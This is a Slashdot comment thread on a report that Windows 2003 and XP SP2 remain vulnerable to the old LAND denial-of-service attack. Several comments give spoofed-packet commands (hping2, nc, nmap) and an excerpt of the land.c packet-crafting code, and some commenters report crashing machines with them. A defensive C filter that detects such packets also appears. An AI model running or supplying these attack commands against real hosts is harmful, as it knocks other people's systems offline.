Windows 2003 and XP SP2 Vulnerable To LAND Attack
An anonymous reader writes "Dejan Levaja, a Serbian security engineer has discovered that nearly 8 years after the attack was first made public, Windows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this to work, but there's a whole lotta machines that don't have it turned on.
Are only Windows platforms vulnerable, or will these attacks be successful on other, non-MS platforms?
Trolling using another account since 2005.
It is also subject to sea and air attacks.
In other news, my computer is also prone to failing if I microwave it... hit it with a hammer, or attempt to install water cooling while I'm drunk...
---
Programming is like sex... Make one mistake and support it the rest of your life.
"Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on."
Machines that are not protected are vulnerable. Well, that isn't really news is it? Sounds pretty silly to me.
Only one remote hole in the kernel FOR eight years!
You mean to tell me that XP and 2k3 contain buggy legacy code? that IS news!
Isn't this EXACTLY what regression tests were designed for?
The pirates come by sea, not LAND.
if a 6.1 KB file takes 20 seconds to get downloaded?!
only that the server is going to get fried
And everybody is surprised by this because...?
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
Amazing, if I don't use I firewall, I'm vulnerable. Who would have thought?
E = m c^3 Don't drink and derive E = m c^3
Anyway, given all the warnings about Internet security in the last five years, the majority of users will already have downloaded and installed firewall programs such as ZoneAlarm.
Not trying to be an M$ apologist, but who will really be vulnerable to this? Home (l)users will most likely have the firewall on (because it is on by default) and any sane IT dept. will have a hardware firewall guarding any internet facing windows boxen. If you haven't firewalled your boxen in this day and age, you pretty much get what you deserve.
It may be a little thing called a firewall. A firewall is a spyware-like little piece of software that constantly pings a special server called a firedoor so that spammers, hackers, and their ilk know when your computer is available on the internet. Unfortunately Microsoft refuses to release a patch for this thing but a piece of software called a backdoor can be used to prevent the firewall from doing its dirty work. Download one today!
01 if by LAND, 10 if by SEA
Let's hope Dejan Levaja does not fall victim to the usual retaliation by big software co's like Dmitry Sklyarov.
This is not the sig you are looking for...
At least with SP2 there is some basic security in terms of the firewall being on by default.
Still, never thought I'd see a slashdot article linking to a page about Trumpet Winsock in 2005!
Get a free iPod Nano 4GB!
In this case, your computer is prone to failing when someone else decides that it should go down.
Windows is one of the safest OS around (and to keep it that way it is advised that the computer should not be connected to internet or any other network for that matter)
fuvoo: watch something
Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received, so I decided to share this info with security community.
Of course they didn't reply. They're under LAND attack, and your message is caught in the server. You must have sent them a proof-of-concept, so what did you expect?
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
So it's a way to either remotely lock up or reboot a target machine. I would assume (not having, you know, tried it or anything) that this includes most windows-based webservers.
Tm
Support TBI Research: http://www.raisinhope.org
Of course, some windows machines need to have open ports, like, say, if they're offering *services*. So really, your mundane desktop need not be affected. It's the production server you should be quite terrified about.
WARNING: there is a trojan on your
A friend showed this to me a few days ago and I was unable to reproduce the attack over the LAN, both with my own code and some code of the original LAND found with google. Both were run from linux by opening a raw socket, filling in ip and tcp headers including checksums using the structs in ip.h and tcp.h, and sending with sendto(). In both cases ethereal would show the packet as received but the machine would operate normally.
8 years is hardly enough to figure out how to patch windows.
Besides, like everyone here says, it is the user's own fault for not using a firewall. Having an expectation that 8 yr old attacks should be fixed is just unreasonable.
WTF, are you all on crack?
If I read correctly:
Sending TCP packet with SYN flag set, source and destination IP address and source
and destination port as of destination machine, results in 15-30 seconds DoS condition.
So sending such a packet every 10 seconds to a Windows internet (http) host will make it disappear from the internet? DoS attack? That is lame.
I remember the days of Ping of Death, Land, Teardrop, New Tear, Bork, etc.
Now that my WinXP SP2 system is susceptible to land again, it's getting me into a nostalgic mood. I think I'll go play Ms PacMan on my MAME cabinet now.
I'm a big tall mofo.
Just remember that these people running 2003/XP without a firewall would also be running *NIX with a root password of "password". Mine is 12345
I have yet to install SP2 because I heard it hurts performance of some computer games, which is mainly what I use my windows PC for.
I am otherwise up-to-date with windows updates. I have a linksys router for my internet connection, but no software firewall.
Am I vulnerable to this and other issues? Should I update to SP2 already (the first time I tried it crashed while installing, didn't even work, but I could prob. get it to work next time). Or should I stay with SP1 for games?
Thank you.
You are trolling of course but recently I was thinking WHAT IF an idealistically-minded political leader gets the right exposure to the "free as in freedom" concept.. Not necessarily W mind you.
The server has been slashdotted... guess it wasn't such a bad idea after all. Now fewer people can get to that file :)
and the usb slots closed lest you should hurt your OS
WTF is a LAND attack? From the source:
"LAND attack:
Sending TCP packet with SYN flag set, source and destination IP address and source and destination port as of destination machine, results in 15-30 seconds DoS condition."
If I understand correctly, this means the vulnerable machine will attempt to synchronise a connection with itself?
I find this quote enlightening:
"Ethic:
Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received, so I decided to share this info with security community. "
So the vulnerability was made public. So exploits are going to be made. However, if Microsoft, who claim to have shifted more focus to security issues, had even acknowledged this report, the vulnerability wouldn't have become public so soon without a patch.
Kinda worries you about the way computer security is handled, doesn't it?
Misleading titles? Inflammatory blurbs? Keep in mind that Slashdot is a tabloid.
In other news, most homes are vulnerable to the classic BREAKIN attack if doors are left unlocked.
Film at 11.
leaving your firewall, spamblocker, pop-up blocker, and virus protection programs off will leave your computer vulnerable to serious attacks....
I mod down so you can mod up. You're welcome.
We've moved on to more productive uses of vulnerable machines (e.g. spam zombies). Who wants to do a DOS attack on a machine without a firewall anyway? What's the point?
Have you read my blog lately?
to Dejan "Vue" Levaja! Thank you, I'm here 'till Thursday.
Experts say servers are vulnerable to the infamous CAFE attack. One drop can take down an entire network!
Granted you have to have a computer next to a cup of coffee for this to work, but MANY PEOPLE DO!!!!!!!!!!
If Nalgene water bottles are outlawed, only outlaws will have Nalgene water bottles.
Grab a copy of hping2 and try:
hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd
Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test
Yep, I never spell check.
More incorrect spellings can be found he
BSDI 2.1 (vanilla) IS vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
BSDI 3.0 NOT vulnerable
Digital UNIX 4.0 NOT vulnerable
FreeBSD 2.2.2-RELEASE IS vulnerable
FreeBSD 2.2.5-RELEASE IS vulnerable
FreeBSD 2.2.5-STABLE IS vulnerable
FreeBSD 3.0-CURRENT IS vulnerable
HP-UX 10.20 IS vulnerable
IRIX 6.2 NOT vulnerable
Linux 2.0.30 NOT vulnerable
Linux 2.0.32 NOT vulnerable
MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
NetBSD 1.2 IS vulnerable
NeXTSTEP 3.0 IS vulnerable
NeXTSTEP 3.1 IS vulnerable
Novell 4.11 NOT vulnerable
OpenBSD 2.1 IS vulnerable
OpenBSD 2.2 (Oct31) NOT vulnerable
SCO OpenServer 5.0.4 NOT vulnerable
Solaris 2.5.1 IS vulnerable (conflicting reports)
SunOS 4.1.4 IS vulnerable
Windows 95 (vanilla) IS vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable
Trolling using another account since 2005.
I know the land attack is old, but still, linking to a .c ? Why not link to the description of the attack and let that be enough. I was not aware /. was a scriptkiddie toolz warehouse. As stated by the article, there are still probably a bunch of machines this will affect, and putting a link directly to LAND.c on the main page probably isn't such a good idea. What's next, root kits?
/. don't know how to use a search engine?
Honestly. Why don't you just stick your head in the ground every time there's a problem. If you don't see it, it can't be real.
C'mon. How much more difficult is it to go to google, type in "land.c" and get the source yourself?
Do you honestly think people visiting
Besides, any good system administrator has to assume that every user out there has access to the latest, greatest, and most sophisticated tools to get into their systems.
And this is an 8 year-old exploit to boot.
OH NOES! He linked to the h4x0r f13lz! Whut k4nz W3 DOOZ?! C4llz 0wtz t3h wh4mbul4nc3!!!11!!
It shouldn't matter a single bit what gets linked to. The information is out there, anyone who wants to find it will. You can't try and suppress it. And to say that linking to it makes it easier... what did I just say about search engines? Oh gee, I've been saved a whole 5 seconds from going to google and finding it myself. Maybe all windows machines will be patched within that time?
Vizzini: You only think I guessed wrong - that's what's so funny. I switched glasses when your back was turned. Ha-ha, you fool. You fell victim to one of the classic blunders, the most famous of which is "Never get involved in a land war in Asia", but only slightly less well known is this: "Never go in against a Sicilian, when *death* is on the line.". Hahahahahah. [Vizzini falls over dead]
(Yeah, off topic, I don't care.)
I'm not a programmer, so looking through a C file isn't likely to give me any useful information, unless it's in comments at the beginning of the code. What's more, I imagine even programmers would rather just hear a summary than have to sit there and look through a bunch of code to figure out what it does.
/. stories, link to relevant and, if possible, concise descriptions of terms that people are likely to be unfamiliar with. If you want to provide a link to source, do it separately and note it as such.
I mean, ethical issues aside, it's just not that helpful to most people. I'm sure most people thought "WTF is a LAND attack?" and clicked on the link to see. Getting a C file is probably not the answer they wanted, especially given that it doesn't seem to be transferring, so I can't even see if it has useful comments or not.
When doing
I know the land attack is old, but still, linking to a .c ? I was not aware /. was a scriptkiddie toolz warehouse.
Not only that, it was unlabeled. That means anybody who followed the link now has a copy of the malware in their machine's webcache, minimum. And if they saved it (to keep the list of vulnerable configurations, for example) they have the malware itself.
This simultaneously puts a bunch of slashdot readers at legal risk (from false prosecution and/or in-court character assassination, based on evidence from a seized computer) and gives real baddies plausible deniability.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Looking at the code, this looks almost like something a firewall might let through. Let's say you have a web server. Obviously you must open up for syn packets to port 80. Would the Windows builtin firewall catch this?
I haven't read any comment saying that this really works, could anyone confirm this?
ajf
...so we all can modify the code and make a worm.land attack...
Security through obscurity doesn't work. Here's the important part of the source :) Basically it just sends a SYN packet which has the target's address as the source and the destination (same port as well).
---snip---
/* zero the buffer, then fill in the IP header */
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->ttl=255;
ipheader->protocol=IP_TCP;
ipheader->saddr=sin.sin_addr.s_addr;   /* source address = target */
ipheader->daddr=sin.sin_addr.s_addr;   /* destination address = target */
/* TCP header: same port on both sides, SYN only */
tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);
/* pseudo-header for the TCP checksum */
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
---snip---
http://support.microsoft.com/default.aspx?scid=kb;en-us;165005
In Soviet Russia, Trojan exploits YOU!
Being a military type, I would assume that yes, most computers are vulnerable to the majority of conventional land-based assaults. This is due more to physics than software.
StrayByte.Net
This incident is just another example which demonstrates the importance that KDE, Mozilla & Mozilla Firefox's open source culture places on security. Hasn't anyone at Mozilla and KDE ever heard about regression testing?
This incident is just another example which demonstrates the importance (or more accurately, the lack thereof) that Linux's open source culture places on security. Hasn't anyone at Linux ever heard about regression testing?
Open source has consistantly (sic) demonstrated that, regardless of what their press releases say, security is NOT one of their priorities. People need to start waking up and realizing this before they entrust their critical infrastructure to open source products.
See how stupid your comment is? No? Didn't think so.
Just 5 minutes before I read this post, I turned the firewall on my WinXP SP2 machine off, testing something on our LAN.
Can you imagine what amount of fear I felt when I realized that this guy lived only 2 miles from my office...
No sig today.
I pointed this out YEARS ago. I just don't understand why the updated winsock didn't get used in 2k when they overhauled the tcp stack. (and wow is that an old email addy. heh)
Gonzo Granzeau
"Nothing the god of biomechanics wouldn't let you into heaven for.." -Roy Batty
... down the toilet
That's a list of operating systems from 1997, taken out of an exploit from 1997. Linux 2.0.30? Novell 4.11? Solaris 2.5.1?
HA! linking to a whole C file... You'd think they'd just link to a 2-line perl script.
Would all you morons shouting about firewalls shut up for thirty seconds and consider the following scenario:
User is in big corp behind firewall.
User receives email claiming to be something or other.
User runs attachment.
All 'doze boxes in big corp stop working.
Firewalls are (a) not the answer to all crap coding and (b) not perfect solutions even so.
Justin.
You're only jealous cos the little penguins are talking to me.
Back in the day..
I remember using BitchX on my old Slackware machine on a 10base2 lan connection at work..
Hanging out in the popular IRC channels armed with some onjoin and onexit and mass nuke scripts. Wiping people out left and right. Others would improve the scripts to the point a few clicks and you could basically wipe out whoever you wanted and spoof the source address. At first people were confused but eventually people started to catch on that something strange was going on. People that patched were still hanging around and would try to offer help to others. I remember some of the patched guys threatening to report the IP address of the people doing the nuking to the ISP and to the ops. Of course the scripts would use the source IP address of the destination so they in fact looked real stupid complaining about themselves. "Hey asshole at 204.123.123.123, I see you trying to nuke me", shortly after the ops would ban that person because that was his own address. There were quite a few other large holes back then that would affect many different systems. If I remember correctly, it was ssping, winnuke, and land, all showed up within weeks of each other. Luckily I also had access to a DEC machine shell from a CS department friend at a college campus and could connect back to the Linux channels with IRC on that machine to see what was going on and what needed patching, recompile whatever with the patches and get my Linux machine back on. It was a fun few months. Back then MS security consisted of blaming the rogue users for sending packets that should not be on a network instead of accepting responsibility for their machines crashing because of it. Meaning, they played this off as their software was not the problem, it was the Linux and Unix people that needed fixing because they allowed these packets to be sent in the first place. All the while, everyone with MS software could not stay online for more than a few minutes before hard locking. It was fun while it lasted. I learned more about networking and Linux in that 3 months than any other 3 month period since.
The source and description are essentially the same, it's a very simple attack, you don't really need a c compiler on most machines to pull it off:
nc -s $IP $IP 113
nmap -sS -S $IP $IP -p 113
or anything else that lets you connect with a spoofed ip.
Pain lasts, kid. Its how you know you're alive. Sometimes I think this growing up thing is just pain management-TheMaxx
Updates to TCPIP.SYS which will invalidate the lvllord Event 4226 patch.
Had to hack the old land.c to compile on my FC 3 machine, but it works nicely.
Every packet causes about 10 seconds of heavy CPU usage on Windows Server 2003. Ditto for Windows XP SP2.
Processes like a CS server running on the XP box were completely unresponsive. Let the DoSing begin.
Spaf and I dissected it back in 98: http://portal.acm.org/citation.cfm?id=353697
The interesting thing about land is that it resulted from two different interpretations of the RFC. One said send X in this state and another said Y. Hence, lots of unrelated protocol stacks had the vulnerability while others didn't.
But then you'd also think people would use good passwords, and not open virused attachments over and over. Working in the computer support industry, I can tell you that none of these are the case. People suck at the Internet. Though the instructions they need to follow are simple, as simple as say auto safety, they simply refuse to learn.
For example, we have a lab here that chooses to maintain their own systems, rather than allowing us to do so. Their stated goal is network research, they are supposedly people that know about networking. So we get a call that we have a machine doing naughty things in the building, track it down, it's in that lab. It's a Linux system that nobody can figure out the password to because it's been completely 0wned. So we tell them to wipe it and so on. Next day, another call, and it's the same computer. Why? Well they just reinstalled the same old version of RedHat, with a load of services turned on, and didn't patch it. They were baffled as to why this was a problem.
Now this is just one of my favourite examples, I can pick from hundreds, and I've only worked here a year. There are users who will open virused e-mail attachments over and over, users that spyware their computers to the point of unusability, and so on. It happens ALL the time, and indeed we spend a considerable amount of our budget getting technology to protect users from themselves (like a departmental firewall, e-mail filter, etc).
Now, worst of all, we are a technical department, an engineering department. These aren't art majors here, and they still don't protect their computers.
So no, it's not valid to assume most people are safe, in fact I'd assume most people are not safe.
"Never get involved in a land war in Asia."
P.
Everytime MS has a security bug that causes millions in damage, MS gets a little bit more egg on their face.
So now we have Bill Gates and co. coming out and saying, "Windows is our #1 priority." Everyone feels better, because hey... Bill's on the case right?
Then, out of left-field, it turns out that Windows is vulnerable to an exploit that's practically ancient in the biz. And what if you can get through the firewall somehow? Or what if you're cruising around wireless networks on a laptop?
This kind of one-shot lockup is something from the dark ages of computing. Everyone's confidence in MS should be lowered even further.
Slashdot. It's Not For Common Sense
The exploit is seven years old; linking to it will not cause an internet kill frenzy.
All I did was click on and open the c file, and Visual Studio .NET locked up while loading it, bringing Explorer down with it and rendering my system useless.
SP2 if by LAND, and SP3 if by Sea, lord help us when we get to SP6. ducks
For all those Paul Revere fans out there! :)
Any Nominus
From the blurb: Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.
Uh.... so what? The firewall lets you know you're not protected if it's not active. Let idiots suffer if they're too stupid to do what they need to do. FWIW; I think Microsoft's firewall fix is enough in the case of the mass user.
Dedicated Cthulhu Cultist since 4523 BC.
Unfortunately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected :?
Since this attack sends a packet with a source address of the target host rather than the attacker, won't this attack fail in a vast majority of remote situations (i.e. via Internet or not on the same LAN as the target)?? Doesn't almost every ISP filter outgoing packets for a bit of sanity, especially valid (or reasonable) source addresses? I know my ISPs at home (Adelphia cable) and work (AT&T data) do.
-Lod
The idea behind a server (such as the affected W2K3 server) being connected to a network is to provide a service to the clients. If the machine is not fit to provide services to the network, might as well go back to the store and ask for a reimbursement and exchange to XP workstation.
The only safe way to safely run this server is to place it behind a SPI firewall. Packet filters will have a hard time detecting and blocking this kind of attack, you will need a full blown SPI to defend and block against these attacks.
SMCs, Linksys and other consumer level firewall seem to be vulnerable to this thing, the only thing that might save your server is the NAT they might provide. Of course if you are running your server on a public routable IP, then you better start thinking of running a serious setup there.
My other OS is the MCP!
Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.
OK, so what you're saying is that in order for XP to be vulnerable, it must be directly connected to the Internet, the user must specifically have disabled the firewall, and no intermediate firewall must be present.
At what point do we cease blaming Microsoft for stupid user tricks? I mean, Microsoft has freely given SP2 to anyone who wants it. Pretty soon it will be a mandatory download from WindowsUpdate. People bitched and moaned for years that Microsoft didn't do enough for security and didn't default to having updates apply automatically. But when Microsoft finally does improve security (with a better firewall) and tries to turn it all on by default, everyone griped. Damned if you do...
Look, if a Windows zealot took something like Fedora, turned on a bunch of services, turned off the firewall, and then griped because his box got hacked, Slashdotters everywhere would be screaming that this guy was a fool, that Linux security is great when it's not sabotaged by an idiot at the keyboard. And they'd be right. But when an attack requires that a Windows user actively subvert the very security measures Microsoft's put in place to protect him, everybody blames Microsoft. Nope, no bias to see here, citizens, please move along.
In the end they will lay their freedom at our feet and say to us, Make us your slaves, but feed us. - Fyodor Dostoyevsky
One more who's actually read MSFT's "A parent's primer to computer slang". This is the first time I encounter the usage of "'sploits" in real life.
:/
Therefore, definitely a valuable comment of yours - thank you. Just a pity there's no "z" in it
:%s/Open Source/Free Software/g
YTARY!
He makes a point which undermines the microshilling of the grandparent post.
I hit a Windows XP SP1 box with this to no effect. I had to make some changes to even compile it (http://mixter.void.ru/glibc.txt). But the test box didn't blink.
perl -e 'foreach(values %SIG){$_="IGNORE";}while(){}'
Many corporate networks only protect the connection between the Internet and the LAN, and it only takes one sales guy to bring in a breached laptop to topple this type of security. I've seen this happen quite often.
-- I bought this SIG on ebay.
if((source_ip == dest_ip) && (source_port == dest_port))
{
break;
}
:-p
Am I missing something, or could Microsoft fix this glitch with pretty much the above code?
Btw Microsoft.. the above code is patent pending, so you better send me a check before using such complex algorithms
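The check proposed in the post above, carried out against actual packet bytes rather than pseudocode, plus the "does my ISP drop packets whose source is on my side of the link" sanity filter raised earlier in the thread. This is an added example written for this page; it is not code from the original post, from land.c, or from any Windows or firewall source. The function names (is_land_packet, is_spoofed_local_source, build_tcp, self_test) and the sample addresses (192.168.1.0/24 as the local prefix, 192.168.1.5 as the target, 203.0.113.7 as an outside client) are constructed here for illustration.

```c
/* land_check.c: flag LAND-style packets in raw IPv4/TCP bytes.
 * Added example for this thread, not code from the original post or land.c.
 * Function names and the sample addresses below are made up for illustration. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define FLAG_SYN 0x02
#define FLAG_ACK 0x10

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)(v >> 16)); wr16(p + 2, (uint16_t)v); }

/* The check the thread proposes, applied to the wire format: returns 1 if the
 * buffer is an IPv4 TCP SYN whose source address:port equals its destination
 * address:port, 0 for any other packet, -1 if it is too short or not IPv4/TCP.
 * Every field is bounds-checked before it is read; ihl comes from the packet
 * and must not be trusted, otherwise the filter itself becomes the target. */
int is_land_packet(const uint8_t *buf, size_t len)
{
    if (len < 20 || (buf[0] >> 4) != 4) return -1;
    size_t ihl = (size_t)(buf[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 20) return -1;   /* need a full TCP header too */
    if (buf[9] != 6) return -1;                  /* protocol is not TCP */
    uint32_t saddr = rd32(buf + 12), daddr = rd32(buf + 16);
    const uint8_t *tcp = buf + ihl;
    uint16_t sport = rd16(tcp), dport = rd16(tcp + 2);
    uint8_t flags = tcp[13];
    return (saddr == daddr && sport == dport && (flags & FLAG_SYN)) ? 1 : 0;
}

/* The ISP/edge sanity filter discussed above: a packet arriving from outside
 * whose source address falls inside our own prefix is spoofed, LAND or not.
 * net and mask are in host byte order. Returns 1 to drop, 0 to pass, -1 if
 * the buffer does not hold a parseable IPv4 header. */
int is_spoofed_local_source(const uint8_t *buf, size_t len, uint32_t net, uint32_t mask)
{
    if (len < 20 || (buf[0] >> 4) != 4) return -1;
    return ((rd32(buf + 12) & mask) == (net & mask)) ? 1 : 0;
}

/* Build a minimal 40-byte IPv4+TCP packet (no options; checksums left zero,
 * since this is parser input, not something to put on the wire). */
size_t build_tcp(uint8_t out[40], uint32_t saddr, uint32_t daddr,
                 uint16_t sport, uint16_t dport, uint8_t flags)
{
    memset(out, 0, 40);
    out[0] = 0x45;            /* version 4, ihl 5 */
    wr16(out + 2, 40);        /* total length */
    wr16(out + 4, 0x0F1C);    /* id, same constant land.c uses */
    out[8] = 255;             /* ttl */
    out[9] = 6;               /* TCP */
    wr32(out + 12, saddr);
    wr32(out + 16, daddr);
    wr16(out + 20, sport);
    wr16(out + 22, dport);
    out[32] = 0x50;           /* data offset 5 */
    out[33] = flags;
    wr16(out + 34, 2048);     /* window */
    return 40;
}

/* Runs the cases a firewall author would want covered and returns how many
 * behave as expected (6 when everything is right). */
int self_test(void)
{
    const uint32_t net = 0xC0A80100, mask = 0xFFFFFF00;   /* 192.168.1.0/24 (constructed) */
    const uint32_t victim = 0xC0A80105;                    /* 192.168.1.5 (constructed) */
    const uint32_t outside = 0xCB007107;                   /* 203.0.113.7 (constructed) */
    uint8_t p[40];
    int ok = 0;

    build_tcp(p, victim, victim, 135, 135, FLAG_SYN);      /* the LAND packet */
    ok += is_land_packet(p, 40) == 1;
    ok += is_spoofed_local_source(p, 40, net, mask) == 1;  /* would also die at the edge */

    build_tcp(p, outside, victim, 40000, 135, FLAG_SYN);   /* an ordinary connect */
    ok += is_land_packet(p, 40) == 0;
    ok += is_spoofed_local_source(p, 40, net, mask) == 0;

    build_tcp(p, victim, victim, 135, 135, FLAG_ACK);      /* same tuple, no SYN */
    ok += is_land_packet(p, 40) == 0;

    build_tcp(p, victim, victim, 135, 135, FLAG_SYN);
    ok += is_land_packet(p, 30) == -1;                     /* truncated: reject, never read past the end */
    return ok;
}

int main(void)
{
    int passed = self_test();
    printf("%d/6 cases behave as expected\n", passed);
    return passed == 6 ? 0 : 1;
}
```

is_land_packet follows the thread's own definition of the attack (SYN set, source tuple equal to destination tuple), which is why the same-tuple ACK case returns 0. A filter in front of a server should not be that picky: a packet whose source address equals its destination address, or whose source lies inside the local prefix but arrives on the outside interface, has no legitimate reason to exist and can be dropped on the address check alone, which is what is_spoofed_local_source does. Note that this only helps a host on a public address if the filtering happens upstream of it; the check is a lot cheaper than whatever the TCP stack does with the packet once it is accepted.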
Believe it or not, some folks still use Solaris 2.5 and 2.6 versions. I used to work at a university whose physics department was fortunate enough to have two electron scanning microscopes, one old and huge and one new, smaller one. The old one had controlling software that was custom, to say the least, and written by a German firm that's been out of business for a few years now.
Guess what OS the software ran on? And what hardware connections were custom to the old Sparc-based controller the ran the thing? Wohoo! Old Solaris was the only way it'd still 'go'.
Well, sneaker-net wasn't going to work for the grads that were abroad and well, the profs wanted network access, so they were going to get it. Short of the long, we had to build, tweak and mess with all kinds of junk (tcpwrappers, ssh, ssl) before it went back on the network (yes, that donkey had been hacked before). So yes, there's lots of old Solaris still out there.
And before anyone asks, yes I finally quit that job due to *not* being able to secure things like this. Authenticating gateways, openvpn, pf on Solaris (boss would *never* let me put that on all the machines we cared for... unbelievable really), moving *away* from Sendmail, installing Solaris machines with everything locked down, etc, etc). Drove me fucking mad.
Thanks for the BSD source code link, it compiled with no problems and what do you know, it actually does choke up an XP SP 2 box for 15-20 seconds. I was a little skeptical when I read this, but wow, it's true, and although it doesn't cause BSOD or reboot anymore it would be quite an irritant.
Ah yes, the classic Princess Bride. Here's the entire "Battle of Wits" scene:
MAN IN BLACK: But if there can be no arrangement, then we are at an impasse.
Vizzini: I'm afraid so -- I can't compete with you physically. And you're no match for my brains.
MIB: You're that smart?
V: Let me put it this way: have you ever heard of Plato, Aristotle, Socrates?
MIB: Yes.
V: Morons.
MIB: Really? In that case, I challenge you to a battle of wits.
V: For the Princess?
MIB: [nods]
V: To the death?
MIB: [Another nod]
V: I accept.
MIB: Good. Then pour the wine.
V: fills the goblets with the dark red liquid
MIB: pulls a small packet from his clothing, handing it to Vizzini.
MIB: Inhale this, but do not touch.
V: I smell nothing.
MIB: What you do not smell is called iocane powder. It is odorless, tasteless, dissolves instantly in liquid, and is among the more deadlier poisons known to man.
V: Hmm.
MIB: [takes the goblets, turns his back. A moment later, he turns again, faces Vizzini, drops the iocane packet. It is now empty.]
MIB: [rotates the goblets in a little shell game maneuver then puts one glass in front of Vizzini, the other in front of himself.]
MIB: All right: where is the poison? The battle of wits has begun. It ends when you decide and we both drink, and find out who is right and who is dead.
V: But it's so simple. All I have to do is divine from what I know of you. Are you the sort of man who would put the poison into his own goblet, or his enemy's?
V: Now, a clever man would put the poison into his own goblet, because he would know that only a great fool would reach for what he was given. I'm not a great fool, so I can clearly not choose the wine in front of you. But you must have known I was not a great fool; you would have counted on it, so I can clearly not choose the wine in front of me.
MIB: You've made your decision then?
V: Not remotely. Because iocane comes from Australia, as everyone knows. And Australia is entirely peopled with criminals. And criminals are used to having people not trust them, as you are not trusted by me. So I can clearly not choose the wine in front of you.
MIB: Truly, you have a dizzying intellect.
V: Wait till I get going! Where was I?
MIB: Australia.
V: Yes -- Australia, and you must have suspected I would have known the powder's origin, so I can clearly not choose the wine in front of me.
MIB: [very nervous] You're just stalling now.
V: [cackling] You'd like to think that, wouldn't you? You've beaten my giant, which means you're exceptionally strong. So, you could have put the poison in your own goblet, trusting on your strength to save you. So I can clearly not choose the wine in front of you. But, you've also bested my Spaniard which means you must have studied. And in studying, you must have learned that man is mortal so you would have put the poison as far from yourself as possible, so I can clearly not choose the wine in front of me.
MIB: You're trying to trick me into giving away something; it won't work.
V: [triumphant] It has worked -- you've given everything away -- I know where the poison is.
MIB: [fool's courage] Then make your choice.
V: I will. And I choose -- [And suddenly he stops, points at something behind the MIB].
V: -- what in the world can that be?
MIB: What? Where? I don't see anything.
V: [switches the goblets while MIB's head is turned].
V: Oh, well, I-I could have sworn I saw something. No matter.
MIB: [turns to face him again]
V: [starts to laugh]
MIB: What's so funny?
V: I'll tell you in a minute. First, let's drink -- me from my glass, and you from yours.
MIB: Yo
AnimeNEXT anime convention
It doesn't need the firewall to be disabled. It just needs an open port. Many machines have some ports open for things like p2p. The summary should either not mention this at all or mention this in its entirety. Just saying that the firewall needs to be disabled is misleading (at least for some/most people).
Two guys are out hiking and they see a bear. One guy starts running and the other yells after him, "Hey, you can't outrun a bear!" He replies, "I don't have to - I only have to outrun you!"
Same logic applies here. You don't have to be perfectly secure (although that'd be nice, no doubt). You just have to be secure enough that others look like much better targets.
Ben Hocking
Need a professional organizer?
Yes, it actually works on SP2. Fire up Task Manager and watch CPU load reach 100% for ~10 seconds for a single packet.
Here's the code that should compile on Linux.
"Never go up against a Sicilian when DOS is on the line!"
Nuclear reactors are vulnerable to overheating which can result in a catastrophic explosion. Granted, you need to have the safety systems turned off for this to work, but the guys at Chernobyl didn't have them turned on.
News value: 0.
Quality of argument: 0.
Overall value: 0.
The source of this attack has been globally available for over 8 years, you twit. How exactly would not re-linking the C exploit be helpful? Even junior grade script kiddies know how to use Google.
Democracy is a sheep and two wolves deciding what to have for lunch. Freedom is a well armed sheep contesting the issue
I just feel I want to try this exploit so bad now.
I'm this close to compiling and trying it out on one of my friends with WinXP :)
But look on the bright side. Now the RIAA won't have to send out cease & desist letters anymore. If the k1dd13s haven't done it already, now all they need to do is one simple command line to get the content off-line :)
Not Buzzword 2.0 compliant. Please speak English.
Windows users are vulnerable to Land Sharks.
Knock knock.
Who's there?
Pizza man.
I didn't order a pizza.
(pause)
Mailman.
Today is Sunday, there is no mail.
(pause)
Doorman.
Our building has no doorman.
(pause)
Travelling salesman.
I don't want anything.
(pause)
Gumby.
Oh, it's Gumby!
(opens door)
RARRRRRRR!!!!!
What you said about NAT is a good point, and something I just discovered while playing with this. NAT inherently defends against this attack because NAT only changes the destination address in the packet and not the source. This change breaks the premise of the attack. The other interesting point you made was that some SOHO routers are vulnerable. Assuming that the attack will be launched remotely, and assuming that most people left their SOHO router at default, there will be no open ports on the router itself, so despite being vulnerable to the attack the conditions don't exist for the router to be a target.
An American computer geek has discovered that if you don't set an administrative password, your computer is vulnerable to root attacks.
*gasp*
